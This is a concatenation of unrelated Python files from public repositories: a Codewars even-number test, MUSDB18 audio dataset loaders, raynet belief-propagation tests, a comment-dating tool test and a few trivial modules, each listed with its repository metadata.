3da8c9fefbc02f0574644b6d491b6432e543733c | 238 | py | Python | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
Test.describe('Basic tests')
Test.assert_equals(nth_even(1), 0)
Test.assert_equals(nth_even(2), 2)
Test.assert_equals(nth_even(3), 4)
Test.assert_equals(nth_even(100), 198)
Test.assert_equals(nth_even(1298734), 2597466)
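# A solution consistent with the assertions above: counting from zero, the
# n-th even number (1-indexed) is (n - 1) * 2. A sketch of the function under
# test (the kata's reference solution may differ):
def nth_even(n):
    return (n - 1) * 2

assert nth_even(1) == 0
assert nth_even(100) == 198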
| 26.444444 | 46 | 0.764706 | 43 | 238 | 4 | 0.44186 | 0.290698 | 0.465116 | 0.552326 | 0.668605 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131222 | 0.071429 | 238 | 8 | 47 | 29.75 | 0.647059 | 0.058824 | 0 | 0 | 0 | 0 | 0.04955 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3db10460de291f312c4ec5cac23bc86109a6fde6 | 10,507 | py | Python | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | 7 | 2020-08-11T01:06:43.000Z | 2021-11-22T12:36:04.000Z | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | null | null | null | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | 1 | 2021-05-26T01:41:51.000Z | 2021-05-26T01:41:51.000Z | import torch
from torch.utils.data import Dataset
import numpy as np
import musdb
from tqdm import tqdm
class MusdbLoader(object):
def __init__(self, musdb_root='data/musdb18_wav/', is_wav=True):
self.musdb_train = musdb.DB(root=musdb_root, subsets="train", split='train', is_wav=is_wav)
self.musdb_valid = musdb.DB(root=musdb_root, subsets="train", split='valid', is_wav=is_wav)
self.musdb_test = musdb.DB(root=musdb_root, subsets="test", is_wav=is_wav)
assert (len(self.musdb_train) > 0)
class MusdbTrainSet(Dataset):
def __init__(self, musdb_train, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
dev_mode=False):
self.musdb_train = musdb_train
self.window_length = hop_length * (num_frame - 1)
self.lengths = [track.samples for track in self.musdb_train]
self.source_names = ['vocals', 'drums', 'bass', 'other'] # == self.musdb_train.targets_names[:-2]
if target_names is None:
self.target_names = self.source_names
else:
self.target_names = target_names
self.num_tracks = len(self.musdb_train)
# development mode
if dev_mode:
self.num_tracks = 1
self.lengths = self.lengths[:1]
self.cache_mode = cache_mode
if cache_mode:
self.cache_dataset()
def cache_dataset(self):
self.cache = {}
print('cache audio files.')
for idx in tqdm(range(self.num_tracks)):
self.cache[idx] = {}
for source in self.source_names:
self.cache[idx][source] = self.musdb_train[idx].targets[source].audio.astype(np.float32)
def __len__(self):
return sum([length // self.window_length for length in self.lengths]) * len(self.target_names)
    def __getitem__(self, whatever):  # the index is ignored; samples are drawn at random
source_sample = {target: self.get_random_audio_sample(target) for target in self.source_names}
rand_target = np.random.choice(self.target_names)
mixture = sum(source_sample.values())
target = source_sample[rand_target]
condition_input = np.zeros(len(self.target_names), dtype=np.float32)
condition_input[self.target_names.index(rand_target)] = 1.
return [torch.from_numpy(output) for output in [mixture, target, condition_input]]
def get_random_audio_sample(self, target_name):
return self.get_audio_sample(np.random.randint(0, self.num_tracks), target_name)
def get_audio_sample(self, idx, target_name):
length = self.lengths[idx] - self.window_length
start_position = np.random.randint(length)
return self.get_audio(idx, target_name, start_position, self.window_length)
def get_audio(self, idx, target_name, pos=0, length=None):
if self.cache_mode:
track = self.cache[idx][target_name]
else:
track = self.musdb_train[idx].targets[target_name].audio.astype(np.float32)
return track[pos:pos + length] if length is not None else track[pos:]
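# MusdbTrainSet.__getitem__ sums all four source samples into a mixture and
# encodes the randomly chosen target as a one-hot condition vector. The
# encoding itself, sketched with plain lists (the class builds it with
# np.zeros and converts via torch.from_numpy; one_hot_condition is a name
# introduced here for illustration):
def one_hot_condition(target, names=('vocals', 'drums', 'bass', 'other')):
    condition = [0.0] * len(names)
    condition[names.index(target)] = 1.0
    return condition

# e.g. conditioning the network on 'drums':
# one_hot_condition('drums') -> [0.0, 1.0, 0.0, 0.0]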

class MusdbTestSet(Dataset):
    def __init__(self, musdb_test, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
                 dev_mode=False):
        self.hop_length = hop_length
        self.musdb_test = musdb_test
        self.window_length = hop_length * (num_frame - 1)
        self.true_samples = self.window_length - 2 * self.hop_length
        self.lengths = [track.samples for track in self.musdb_test]
        self.source_names = ['vocals', 'drums', 'bass', 'other']  # == self.musdb_test.targets_names[:-2]
        if target_names is None:
            self.target_names = self.source_names
        else:
            self.target_names = target_names
        self.num_tracks = len(self.musdb_test)
        # development mode
        if dev_mode:
            self.num_tracks = 4
            self.lengths = self.lengths[:4]
        import math
        num_chunks = [math.ceil(length / self.true_samples) for length in self.lengths]
        self.chunk_idx = [sum(num_chunks[:i + 1]) for i in range(self.num_tracks)]
        self.cache_mode = cache_mode
        if cache_mode:
            self.cache_dataset()

    def cache_dataset(self):
        self.cache = {}
        print('cache audio files.')
        for idx in tqdm(range(self.num_tracks)):
            self.cache[idx] = {}
            self.cache[idx]['linear_mixture'] = self.musdb_test[idx].targets['linear_mixture'].audio.astype(
                np.float32)

    def __len__(self):
        return self.chunk_idx[-1] * len(self.target_names)

    def __getitem__(self, idx):
        target_offset = idx % len(self.target_names)
        idx = idx // len(self.target_names)
        target_name = self.target_names[target_offset]
        mixture, mixture_idx, offset = self.get_mixture_sample(idx)
        input_condition = np.zeros(len(self.target_names), dtype=np.float32)
        input_condition[target_offset] = 1.
        mixture, input_condition = [torch.from_numpy(output) for output in [mixture, input_condition]]
        window_offset = offset // self.true_samples
        return mixture, mixture_idx, window_offset, input_condition, target_name

    def get_mixture_sample(self, idx):
        mixture_idx, start_pos = self.idx_to_track_offset(idx)
        length = self.true_samples
        left_padding_num = right_padding_num = self.hop_length
        mixture_length = self.lengths[mixture_idx]
        if start_pos + length > mixture_length:  # last chunk of the track
            right_padding_num += self.true_samples - (mixture_length - start_pos)
            length = None
        mixture = self.get_audio(mixture_idx, 'linear_mixture', start_pos, length)
        mixture = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), mixture,
                                  np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
        return mixture, mixture_idx, start_pos

    def idx_to_track_offset(self, idx):
        for mixture_idx, last_chunk in enumerate(self.chunk_idx):
            if idx < last_chunk:
                if mixture_idx != 0:
                    offset = (idx - self.chunk_idx[mixture_idx - 1]) * self.true_samples
                else:
                    offset = idx * self.true_samples
                return mixture_idx, offset
        return None, None

    def get_audio(self, idx, target_name, pos=0, length=None):
        if self.cache_mode and target_name == 'linear_mixture':
            track = self.cache[idx][target_name]
        else:
            track = self.musdb_test[idx].targets[target_name].audio.astype(np.float32)
        return track[pos:pos + length] if length is not None else track[pos:]
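`get_mixture_sample` pads every window with `hop_length` zeros on each side and, for the final chunk of a track, grows the right padding so that every window comes out the same length. A small self-contained sketch of that padding rule (the numbers are hypothetical and chosen for illustration; the real method operates on stereo audio arrays of shape `(samples, 2)`):

```python
import numpy as np

hop_length = 2       # illustrative values only
true_samples = 10
track_length = 23    # samples in a hypothetical mono track

def padded_window(track, start_pos):
    # Mirror of the padding logic in get_mixture_sample above.
    length = true_samples
    left_pad = right_pad = hop_length
    if start_pos + length > len(track):  # last chunk of the track
        right_pad += true_samples - (len(track) - start_pos)
        length = None
    chunk = track[start_pos:start_pos + length] if length is not None else track[start_pos:]
    return np.concatenate((np.zeros(left_pad, dtype=np.float32),
                           chunk,
                           np.zeros(right_pad, dtype=np.float32)))

track = np.ones(track_length, dtype=np.float32)
# Every window, including the final partial one, has the same padded length.
assert all(len(padded_window(track, s)) == true_samples + 2 * hop_length
           for s in range(0, track_length, true_samples))
```

The extra `hop_length` samples on each side give the STFT full context at the window borders; the caller later discards those border frames.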

class MusdbValidSet(Dataset):
    def __init__(self, musdb_valid, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
                 dev_mode=False):
        self.hop_length = hop_length
        self.musdb_valid = musdb_valid
        self.window_length = hop_length * (num_frame - 1)
        self.true_samples = self.window_length - 2 * self.hop_length
        self.lengths = [track.samples for track in self.musdb_valid]
        self.source_names = ['vocals', 'drums', 'bass', 'other']  # == self.musdb_valid.targets_names[:-2]
        if target_names is None:
            self.target_names = self.source_names
        else:
            self.target_names = target_names
        self.num_tracks = len(self.musdb_valid)
        # development mode
        if dev_mode:
            self.num_tracks = 1
            self.lengths = self.lengths[:1]
        import math
        num_chunks = [math.ceil(length / self.true_samples) for length in self.lengths]
        self.chunk_idx = [sum(num_chunks[:i + 1]) for i in range(self.num_tracks)]
        self.cache_mode = cache_mode
        if cache_mode:
            self.cache_dataset()

    def cache_dataset(self):
        self.cache = {}
        print('cache audio files.')
        for idx in tqdm(range(self.num_tracks)):
            self.cache[idx] = {}
            for source in self.source_names + ['linear_mixture']:
                self.cache[idx][source] = self.musdb_valid[idx].targets[source].audio.astype(np.float32)

    def __len__(self):
        return self.chunk_idx[-1] * len(self.target_names)

    def __getitem__(self, idx):
        target_offset = idx % len(self.target_names)
        idx = idx // len(self.target_names)
        target_name = self.target_names[target_offset]
        mixture_idx, start_pos = self.idx_to_track_offset(idx)
        length = self.true_samples
        left_padding_num = right_padding_num = self.hop_length
        mixture_length = self.lengths[mixture_idx]
        if start_pos + length > mixture_length:  # last chunk of the track
            right_padding_num += self.true_samples - (mixture_length - start_pos)
            length = None
        mixture = self.get_audio(mixture_idx, 'linear_mixture', start_pos, length)
        target = self.get_audio(mixture_idx, target_name, start_pos, length)
        mixture = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), mixture,
                                  np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
        target = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), target,
                                 np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
        input_condition = np.zeros(len(self.target_names), dtype=np.float32)
        input_condition[target_offset] = 1.
        mixture, input_condition, target = [torch.from_numpy(output) for output in [mixture, input_condition, target]]
        window_offset = start_pos // self.true_samples
        return mixture, mixture_idx, window_offset, input_condition, target_name, target

    def idx_to_track_offset(self, idx):
        for i, last_chunk in enumerate(self.chunk_idx):
            if idx < last_chunk:
                if i != 0:
                    offset = (idx - self.chunk_idx[i - 1]) * self.true_samples
                else:
                    offset = idx * self.true_samples
                return i, offset
        return None, None

    def get_audio(self, idx, target_name, pos=0, length=None):
        if self.cache_mode:
            track = self.cache[idx][target_name]
        else:
            track = self.musdb_valid[idx].targets[target_name].audio.astype(np.float32)
        return track[pos:pos + length] if length is not None else track[pos:]
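The `idx_to_track_offset` helpers above map a flat chunk index onto a `(track, sample_offset)` pair via the cumulative chunk counts in `chunk_idx`. A minimal standalone sketch of that mapping, with hypothetical track lengths and chunk size chosen for illustration:

```python
import math

# Hypothetical per-track sample counts and chunk size (illustrative only).
lengths = [10, 25, 7]
true_samples = 10

# Cumulative chunk counts, mirroring self.chunk_idx above:
# num_chunks == [1, 3, 1]  ->  chunk_idx == [1, 4, 5]
num_chunks = [math.ceil(length / true_samples) for length in lengths]
chunk_idx = [sum(num_chunks[:i + 1]) for i in range(len(lengths))]

def idx_to_track_offset(idx):
    # Find the first track whose cumulative chunk count exceeds idx,
    # then convert the remaining chunk count into a sample offset.
    for track, last_chunk in enumerate(chunk_idx):
        if idx < last_chunk:
            prev = chunk_idx[track - 1] if track != 0 else 0
            return track, (idx - prev) * true_samples
    return None, None  # idx past the end of the dataset
```

With these numbers, indices 0..4 map to `(0, 0)`, `(1, 0)`, `(1, 10)`, `(1, 20)`, `(2, 0)`, and any larger index falls through to `(None, None)`.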


# --- filterv/__init__.py (ParthikB/filterv, MIT) ---
import filterv.filter


# --- tests/test_start.py (PerU-MoNsteR/EduRobot, MIT) ---
def test_start():
    pass


# --- test/fixtures/python/analysis/c/__init__.py (matsubara0507/semantic, MIT) ---
from . import utils
print(utils.to_s())


# --- api_project_generator/helpers/git_repo.py (gustcorrea/api-project-generator, MIT) ---
from pathlib import Path
from git import Repo


def init_repository(path: Path) -> Repo:
    return Repo.init(path)


# --- cookbook/example.py (benmaier/vaccontrib, MIT) ---
from vaccontrib.io import (
    get_contact_matrix,
    get_vaccine_fractions,
    get_fraction_vaccinated,
    get_population_sizes,
    get_susceptibility_reduction,
    get_transmissibility_reduction,
    get_relative_infection_rate,
    get_relative_recovery_rate,
    get_disease_free_state,
)

functions = [
    get_contact_matrix,
    get_vaccine_fractions,
    get_fraction_vaccinated,
    get_population_sizes,
    get_susceptibility_reduction,
    get_transmissibility_reduction,
    get_relative_infection_rate,
    get_relative_recovery_rate,
    get_disease_free_state,
]

for f in functions:
    print()
    print(f.__name__)
    print(f())


# --- tests/test_mrf.py (paschalidoud/raynet, MIT) ---
import numpy as np
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt

import unittest

from raynet.common.generation_parameters import GenerationParameters
from raynet.mrf.bp_inference import get_bp_backend
from raynet.mrf.mrf_np import compute_occupancy_probabilities
from raynet.ray_marching.ray_tracing import voxel_traversal


def get_generation_params(grid_shape, max_number_of_marched_voxels):
    return GenerationParameters(
        grid_shape=grid_shape,
        max_number_of_marched_voxels=max_number_of_marched_voxels
    )


def append_to_backends(grid_shape, N, M, batch_size=1):
    BACKENDS = []  # Holds a list of all available backends
    common_params = dict(
        generation_params=get_generation_params(grid_shape, M),
        bp_iterations=3
    )
    BACKENDS.append(get_bp_backend("numpy", **common_params))
    BACKENDS.append(get_bp_backend("tf", N=N, **common_params))
    BACKENDS.append(get_bp_backend("cuda", batch_size=batch_size, **common_params))
    return BACKENDS
def test_2d_single_ray(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((10, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices,
ray_start,
ray_end
)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 1, 10)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S,
ray_voxels_indices.reshape(1, 10, 3),
np.ones(1, dtype=np.int32) * Nr,
np.random.random((1, 10)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
)
# The (2, 2) voxel should have the higher probability
max_idx = np.where(occupancy_probabilities == occupancy_probabilities.max())
self.assertEqual(max_idx[0][0], 2)
self.assertEqual(max_idx[1][0], 2)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_1ray.png" % (i,))
plt.close()
def test_2d_single_2rays(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 10, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 10), dtype=np.float32)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
ray_voxel_count = []
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 2.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
# We assume that the (4, 3) voxel is occupied, thus we will give a
# higher probability
S2 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
S_total[1, :] = S2
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 10, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 10)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
# Find which one of the two occupied voxels has the larger probability
max_prob = [occupancy_probabilities[0, 4, 3]
if occupancy_probabilities[0, 4, 3] > occupancy_probabilities[0, 2, 2] else occupancy_probabilities[0, 2, 2]][0]
for i in range(6):
for j in range(6):
self.assertGreaterEqual(max_prob, occupancy_probabilities[0, i, j])
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_2rays.png" % (i,))
plt.close()
def test_2d_single_2rays_2example(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
ray_voxel_count = []
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[1, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S2 = np.array(
[[0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.07]],
dtype=np.float32
)
S_total[1, :] = S2
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
for i in range(6):
for j in range(6):
self.assertGreaterEqual(occupancy_probabilities[0, 2, 2], occupancy_probabilities[0, i, j])
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_2rays_2.png" % (i,))
plt.close()
def test_2d_single_3rays(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((3, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((3, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[0, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
# Ray 2
ray_start = np.array([0.0, 2.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 2.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S2 = np.array(
[[0.45, 0.0875, 0.2, 0.0875, 0.0875, 0.0875, 0.0, 0.0, 0.0, 0.0, 0.0]],
dtype=np.float32
)
S_total[1, :] = S2
# Ray 3
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[2, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S3 = np.array(
[[0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.07]],
dtype=np.float32
)
S_total[2, :] = S3
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 3, 11, batch_size=3)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((3, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
# Make sure that the voxel, for which all rays vote there is a higher
# probability
for i in range(6):
for j in range(6):
self.assertGreaterEqual(
occupancy_probabilities[0, 2, 2],
occupancy_probabilities[0, i, j]
)
for i in range(6):
for j in range(6):
if i == 2 and j == 2:
continue
self.assertGreaterEqual(
occupancy_probabilities[0, 2, 0],
occupancy_probabilities[0, i, j]
)
for i in range(6):
for j in range(6):
if i == 2 and (j == 2 or j==0):
continue
self.assertGreaterEqual(
occupancy_probabilities[0, 4, 4],
occupancy_probabilities[0, i, j]
)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_3rays.png" % (i,))
plt.close()
def test_2d_conflict(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0.0, 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[0, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S_total[0, 2] = 0.5
S_total[0, 6] = 0.5
# Ray 2
ray_start = np.array([0.0, 1.5, 0.5], dtype=np.float32)
ray_end = np.array([4.5, 6.0, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S_total[1, 4] = 1.0
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
self.assertTrue(occupancy_probabilities[0, 0, 2] < 0.1)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_conflict.png" % (i,))
plt.close()
def test_depth_distribution(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0.0, 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
S_total[0, 2] = 0.5
S_total[0, 6] = 0.5
# Ray 2
ray_start = np.array([0.0, 1.5, 0.5], dtype=np.float32)
ray_end = np.array([4.5, 6.0, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[1, :, :],
ray_start, ray_end
)
ray_voxel_count.append(Nr)
S_total[1, 4] = 1.0
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon =\
bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
S_new = bp.estimate_depth_probabilities_from_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
ray_to_occupancy_accumulated_pon,
ray_to_occupancy_messages_pon,
np.zeros_like(S_total)
)
if isinstance(S_new, list):
S_new = S_new[0]
self.assertGreater(0.5, S_new[0, 2])
self.assertLess(0.9, S_new[0, 6])
self.assertLess(0.9, S_new[1, 4])
if __name__ == "__main__":
unittest.main()
| 38.228029 | 128 | 0.554989 | 2,229 | 16,094 | 3.798116 | 0.078959 | 0.046303 | 0.071108 | 0.028349 | 0.860265 | 0.830617 | 0.811009 | 0.791755 | 0.787503 | 0.771911 | 0 | 0.08131 | 0.324469 | 16,094 | 420 | 129 | 38.319048 | 0.697388 | 0.066298 | 0 | 0.668657 | 0 | 0 | 0.015408 | 0.013941 | 0 | 0 | 0 | 0 | 0.032836 | 1 | 0.023881 | false | 0 | 0.023881 | 0.002985 | 0.056716 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b1732832ed81e62d59805322219f19b4edea9227 | 84 | py | Python | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 7 | 2020-02-24T14:59:00.000Z | 2022-02-22T19:17:42.000Z | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 1 | 2020-02-16T18:15:12.000Z | 2020-03-04T22:57:28.000Z | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 4 | 2020-12-25T22:52:22.000Z | 2022-01-23T03:53:28.000Z | from chapter4 import hello


def test_hello_toyou():
    assert hello.toyou() == "hi"


# --- commentdater/test.py (lsingh123/commentdater, MIT) ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 25 12:25:15 2019

@author: lavanyasingh
"""
import unittest
import os
import importlib

import src
importlib.reload(src)


class Tester(unittest.TestCase):

    def test_py(self):
        with open("test_data/test_output.txt", "w") as fd:
            dater = src.CommentDater("test_data/test_infile.py", output=fd)
            dater.parse()
        with open("test_data/test_output.txt", "r") as fd:
            output = "".join(list(fd.readlines()))
        # check outdated single line comment (file modified line 11)
        self.assertNotEqual(output.find("possible outdated comment at test/test_infile.py:9"), -1)
        # check that modified comments aren't included in output
        # (file modified at line 13 and line 14)
        self.assertEqual(output.find("possible outdated comment at test/test_infile.py:13"), -1)
        # check that multiline comments are handled (file modified at line 19)
        self.assertNotEqual(output.find("possible outdated comment at test/test_infile.py:16"), -1)

    def test_c(self):
        with open("test_data/test_output.txt", "w") as fd:
            dater = src.CommentDater("test_data/test_infile.cc", output=fd)
            dater.parse()
        with open("test_data/test_output.txt", "r") as fd:
            output = "".join(list(fd.readlines()))
